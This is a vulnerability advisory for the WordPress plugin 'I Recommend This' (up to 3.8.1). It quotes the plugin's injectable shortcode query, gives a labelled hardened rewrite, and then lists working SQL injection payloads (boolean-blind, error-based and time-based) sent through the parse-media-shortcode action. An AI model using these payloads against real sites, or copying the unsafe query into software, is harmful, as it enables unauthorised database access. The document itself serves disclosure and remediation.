WordPress Plugin Vulnerabilities

I Recommend This <= 3.8.1 - Authenticated SQL Injection

Description

Plugin description: "This plugin allows your visitors to simply like/recommend your posts instead of comment on it."
Active installs (according to https://wordpress.org/plugins/i-recommend-this/): 40.000+

SQL can be injected through the [dot_recommends] shortcode when the unique-IP check is enabled (the default). A low-privileged account is enough for this; subscriber suffices. It is especially critical when WordPress debug mode (WP_DEBUG) is active, since database errors are then displayed (see Vulnerabilities).

dot-irecommendthis.php:65

    add_shortcode( 'dot_recommends', array( &$this, 'shortcode' ) );

dot-irecommendthis.php:559-564

    function shortcode( $atts )
    {
        // $id is taken straight from the shortcode attribute, without sanitization
        extract( shortcode_atts( array('id' => null), $atts ) );
        return $this->dot_recommend($id);

    } //shortcode

dot-irecommendthis.php:587-590 (function dot_recommend($id))

    if( $options['disable_unique_ip'] != '1' ) {
        // $post_ID derives from the shortcode's $id and is interpolated into the
        // query string directly, with no escaping and no prepared statement
        $voteStatusByIp = $wpdb->get_var("SELECT COUNT(*) FROM ".$wpdb->prefix."irecommendthis_votes WHERE post_id = '$post_ID' AND ip = '$ip'");
    }

This great article (https://blog.sucuri.net/2016/08/sql-injection-vulnerability-ninja-forms.html) explains how shortcodes can be exploited and why this works.
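For comparison, here is how the vulnerable query above can be written so that the shortcode's id attribute can no longer alter the SQL. This is an added example, not the plugin's code and not the fix shipped in 3.8.2; the function name safe_vote_status_by_ip is invented, and $wpdb, $options and the irecommendthis_votes table are taken from the snippet above.

```php
<?php
// Added example (not the plugin's own code): hardened form of the
// vote-by-IP lookup from dot_recommend(). Assumes $options is the plugin's
// options array and $wpdb the WordPress database object, as in the original.

function safe_vote_status_by_ip( $id, $ip ) {
    global $wpdb, $options;

    // Coerce the shortcode attribute to a non-negative integer before use.
    // absint() is a core WordPress helper; anything non-numeric becomes 0,
    // so a value like "2' AND ..." is reduced to 2.
    $post_ID = absint( $id );
    if ( 0 === $post_ID ) {
        return 0; // no valid post id, nothing to count
    }

    if ( $options['disable_unique_ip'] != '1' ) {
        // $wpdb->prepare() binds the values through %d / %s placeholders and
        // escapes them itself, so both $post_ID and $ip reach MySQL as data,
        // never as part of the SQL grammar.
        $sql = $wpdb->prepare(
            "SELECT COUNT(*) FROM {$wpdb->prefix}irecommendthis_votes WHERE post_id = %d AND ip = %s",
            $post_ID,
            $ip
        );
        return (int) $wpdb->get_var( $sql );
    }

    return 0;
}
```

Two independent layers are used on purpose: the integer cast closes the id-based injection on its own, and the prepared statement also protects the $ip value, which the original query interpolates in exactly the same unsafe way. With WP_DEBUG enabled a prepared query still fails loudly on a malformed value, but it fails with a wpdb warning rather than an attacker-controlled MySQL error message.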

Vulnerabilities:

If WP_DEBUG is set to true:

Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: shortcode=[dot_recommends id="2' RLIKE (SELECT (CASE WHEN (5258=5258) THEN 0x73686f7274636f64653d5b646f745f7265636f6d6d656e64732069643d22325f5f424f554e4445445f494e4a454354494f4e5f4d41524b5f5f225d26616374696f6e3d70617273652d6d656469612d73686f7274636f6465 ELSE 0x28 END))-- ZKlm"]&action=parse-media-shortcode

Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: shortcode=[dot_recommends id="2' AND EXTRACTVALUE(2988,CONCAT(0x5c,0x716a766a71,(SELECT (ELT(2988=2988,1))),0x7162707a71))-- LCIV"]&action=parse-media-shortcode

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: shortcode=[dot_recommends id="2' AND (SELECT * FROM (SELECT(SLEEP(5)))BQPZ)-- NVfD"]&action=parse-media-shortcode

If WP_DEBUG is set to false (should be the most common scenario):

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: shortcode=[dot_recommends id="2' AND (SELECT * FROM (SELECT(SLEEP(5)))NxWj)-- JHJu"]&action=parse-media-shortcode
Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

Fixed in 3.8.2

Classification

Type: SQLI

Miscellaneous

Submitter: Paul Dannewitz
Verified: No

Timeline

Publicly Published: 2017-08-14
Added: 2017-08-16
Last Updated: 2019-11-01